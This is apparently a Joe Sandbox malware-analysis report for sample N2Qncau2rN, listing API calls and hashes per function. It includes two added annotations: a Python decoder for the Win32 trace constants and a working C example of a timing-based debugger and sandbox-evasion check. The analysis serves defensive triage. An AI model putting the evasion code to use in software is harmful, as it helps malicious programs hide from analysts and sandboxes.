                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 642888154-0
                                                                                                                                                                                                                • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                                                                                                                                • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Variant$Copy$ClearErrorLast
                                                                                                                                                                                                                • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                • API String ID: 2487901850-572801152
                                                                                                                                                                                                                • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                                                                                                                                • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                                                                                                                                                                                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                                                                                                                • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                                                                                                                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                                                                                                                • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$Enable$Show$MessageSend
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1871949834-0
                                                                                                                                                                                                                • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                                                                                                                                • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                                                                                                                                • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                                                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                                                                                                                                                                • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                                                                                                                                                                • SendMessageW.USER32 ref: 00471AE3
                                                                                                                                                                                                                • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3611059338-0
                                                                                                                                                                                                                • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                                                                                                                                • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
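The "APIs" lists in the records above (ShowWindow/EnableWindow with nCmdShow 0 and 4, SendMessageW with message 0x130C, 0x000000F1 and 0x1303, ImageList_Create with flags 0x21) read as raw hex. Decoded against the documented Win32 constants they are ordinary tab-control selection, checkbox state and image-list plumbing of the first-stage binary at 0x400000, which is what a triager needs to know to move past these functions quickly. The helper below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses the page's own trace line format (`• Api.MODULE(args), ref: ADDR`, with `?` for unrecorded values and a bare `Api.MODULE ref: ADDR` form) and names the constants it is sure of; everything else is left as hex rather than guessed. The sample trace is copied from this page; the constant values (SW_*, BM_SETCHECK = 0x00F1, TCM_FIRST = 0x1300, ILC_*) are the documented Win32 ones. Joe Sandbox prints stack slots beyond the declared parameters (ImageList_Create shows nine values for a five-parameter function); those extra values are ignored.

```python
"""Decode Joe Sandbox 'APIs' trace lines into readable GUI operations.

Added triage helper, not part of the Joe Sandbox report or its IDA plugin.
SAMPLE_TRACE is copied from the records on this page; the constant tables
hold documented Win32 values. Unknown values are reported as hex, not guessed.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed input: "APIs" lines copied verbatim from the records above.
SAMPLE_TRACE = """\
• ShowWindow.USER32(?,00000000), ref: 00440A8A
• EnableWindow.USER32(?,00000000), ref: 00440AAF
• ShowWindow.USER32(?,00000004), ref: 00440B2B
• SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
• SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
• ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
• SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
• SendMessageW.USER32 ref: 00471AE3
• DestroyIcon.USER32(?), ref: 00471AF4
"""

LINE_RE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)"   # Api.MODULE
    r"(?:\((?P<args>[^)]*)\))?,?\s*"             # optional (arg,arg,...)
    r"ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"          # call-site address
)

# Documented Win32 constants (ShowWindow nCmdShow, button / tab-control
# messages, image-list creation flags).
SW_NAMES = {0: "SW_HIDE", 1: "SW_SHOWNORMAL", 2: "SW_SHOWMINIMIZED",
            3: "SW_SHOWMAXIMIZED", 4: "SW_SHOWNOACTIVATE", 5: "SW_SHOW"}
TCM_FIRST = 0x1300
MSG_NAMES = {0x00F1: "BM_SETCHECK",
             TCM_FIRST + 3: "TCM_SETIMAGELIST",
             TCM_FIRST + 12: "TCM_SETCURSEL"}
ILC_MASK, ILC_COLOR32 = 0x0001, 0x0020


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]   # None where Joe Sandbox printed '?'
    ref: int                    # call-site address from 'ref:'


def parse_line(line: str) -> Optional[ApiCall]:
    """Parse one trace line; None for non-call lines such as field labels."""
    m = LINE_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [] if not raw else [
        None if a.strip() == "?" else int(a, 16) for a in raw.split(",")]
    return ApiCall(m.group("api"), m.group("module"), args,
                   int(m.group("ref"), 16))


def describe(call: ApiCall) -> str:
    """Human-readable meaning of a call; undecoded values stay as hex."""
    a = call.args
    if call.api == "ShowWindow" and len(a) >= 2 and a[1] is not None:
        return "ShowWindow " + SW_NAMES.get(a[1], f"nCmdShow=0x{a[1]:X}")
    if call.api == "EnableWindow" and len(a) >= 2 and a[1] is not None:
        return "EnableWindow " + ("enable" if a[1] else "disable")
    if call.api == "SendMessageW":
        if len(a) < 2 or a[1] is None:
            return "SendMessageW (message not recorded)"
        return "SendMessageW " + MSG_NAMES.get(a[1], f"msg=0x{a[1]:04X}")
    if call.api == "ImageList_Create" and len(a) >= 3 and None not in a[:3]:
        # Only cx, cy, flags are decoded; Joe Sandbox prints extra stack
        # slots after the five declared parameters, which are ignored here.
        flags = []
        if (a[2] & 0xFE) == ILC_COLOR32:
            flags.append("ILC_COLOR32")
        if a[2] & ILC_MASK:
            flags.append("ILC_MASK")
        return (f"ImageList_Create {a[0]}x{a[1]} "
                + ("|".join(flags) or f"flags=0x{a[2]:X}"))
    return f"{call.api} (no decoder)"


def decode_trace(text: str) -> List[str]:
    """Return 'ADDR  description' for every call line in a trace block."""
    out = []
    for line in text.splitlines():
        call = parse_line(line)
        if call:
            out.append(f"{call.ref:08X}  {describe(call)}")
    return out


if __name__ == "__main__":
    print("\n".join(decode_trace(SAMPLE_TRACE)))
```

Feeding the three "APIs" blocks above through `decode_trace` turns 0x130C into TCM_SETCURSEL, 0x1303 into TCM_SETIMAGELIST and 0x000000F1 into BM_SETCHECK; the 0x21 flag word becomes ILC_COLOR32|ILC_MASK for a 16x16 list. Extend MSG_NAMES only with values you have checked against the SDK headers, since a wrong name in a triage note is worse than a hex number.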
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DestroyWindow$DeleteObject$IconMove
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1640429340-0
                                                                                                                                                                                                                • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                                                                                                                                                • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                                                                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 004438CD
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 004438E6
                                                                                                                                                                                                                • _wcstok.LIBCMT ref: 004438F8
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0044390C
                                                                                                                                                                                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                                                                                                                                                                                • _wcstok.LIBCMT ref: 00443931
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3632110297-0
                                                                                                                                                                                                                • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                                                                                                                                                • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 752480666-0
                                                                                                                                                                                                                • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                                                                                                                                                • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3275902921-0
                                                                                                                                                                                                                • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                                                                                                                                                • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3275902921-0
                                                                                                                                                                                                                • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                                                                                                                                                • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                                                                                                                                                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
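The call sequence listed for this function (Sleep, QueryPerformanceCounter, QueryPerformanceFrequency, Sleep, QueryPerformanceCounter, at 004331B9 through 004331F0) is the shape of a classic execution-timing check: read the high-resolution counter, sleep, read it again, and convert the tick difference with the counter frequency. Run under a debugger that single-steps or stops on a breakpoint inside that window, the measured interval comes out far too long; run in a sandbox that fast-forwards Sleep, it comes out far too short. The report only shows the calls and their order, not what the sample does with the result, so whether the measurement gates any behaviour is not visible here. The following is an added example of such a check, not code recovered from the sample: on Windows it uses the same three APIs; on other platforms clock_gettime and nanosleep stand in (an assumption so the example builds anywhere), and the 2 s slack and the "under half the requested time" rule are illustrative thresholds, not values taken from the binary.

```c
/*
 * Timing-based debugger/sandbox check built from the API pattern
 * Sleep + QueryPerformanceCounter + QueryPerformanceFrequency.
 * Added illustration; not code recovered from the analysed sample.
 * Non-Windows builds substitute clock_gettime/nanosleep (assumption).
 */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdint.h>

#ifdef _WIN32
#include <windows.h>
/* Microseconds derived from the high-resolution performance counter. */
static uint64_t now_us(void) {
    LARGE_INTEGER freq, cnt;
    QueryPerformanceFrequency(&freq);
    QueryPerformanceCounter(&cnt);
    return (uint64_t)cnt.QuadPart * 1000000ULL / (uint64_t)freq.QuadPart;
}
static void sleep_ms(unsigned ms) { Sleep(ms); }
#else
#include <time.h>
static uint64_t now_us(void) {
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000ULL + (uint64_t)ts.tv_nsec / 1000ULL;
}
static void sleep_ms(unsigned ms) {
    struct timespec ts;
    ts.tv_sec = ms / 1000;
    ts.tv_nsec = (long)(ms % 1000) * 1000000L;
    nanosleep(&ts, NULL);
}
#endif

/* Sleep for `ms` and report how long the call actually took, in microseconds. */
uint64_t measure_sleep_us(unsigned ms) {
    uint64_t t0 = now_us();
    sleep_ms(ms);
    return now_us() - t0;
}

/*
 * Decision rule. Returns 1 when the measured interval is implausible for an
 * unobserved run, 0 otherwise:
 *   - far too short: the sleep returned in under half the requested time,
 *     which is what sleep-skipping in an analysis sandbox looks like;
 *   - far too long: the sleep overran the request by more than `slack_us`,
 *     which is what single-stepping or a breakpoint inside the window looks like.
 * `slack_us` absorbs ordinary scheduler jitter and timer granularity.
 */
int timing_looks_observed(unsigned requested_ms, uint64_t elapsed_us,
                          uint64_t slack_us) {
    uint64_t requested_us = (uint64_t)requested_ms * 1000ULL;
    if (elapsed_us * 2 < requested_us)
        return 1;                               /* sleep was skipped or shortened */
    if (elapsed_us > requested_us + slack_us)
        return 1;                               /* execution was paused mid-window */
    return 0;
}

/* One measured sleep judged with a deliberately generous 2 s slack (illustrative). */
int debugger_suspected(unsigned ms) {
    return timing_looks_observed(ms, measure_sleep_us(ms), 2000000ULL);
}

int main(void) {
    unsigned ms = 50;
    uint64_t elapsed = measure_sleep_us(ms);
    printf("requested %u ms, measured %llu us -> %s\n", ms,
           (unsigned long long)elapsed,
           timing_looks_observed(ms, elapsed, 2000000ULL) ? "observed" : "clean");
    return 0;
}
```

Two practical notes for anyone triaging this pattern. First, the check is only as good as its thresholds: a tight slack produces false positives on a loaded host, a loose one lets a fast debugger through, so malware tends to repeat the measurement rather than trust one sample, which is consistent with two Sleep calls appearing in this function. Second, the "too short" branch is the part that matters for sandboxes: fast-forwarding Sleep to shorten analysis time is exactly what this comparison catches, so an analysis environment that skips sleeps should also virtualise the performance counter so the two stay consistent.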
Memory Dump Source
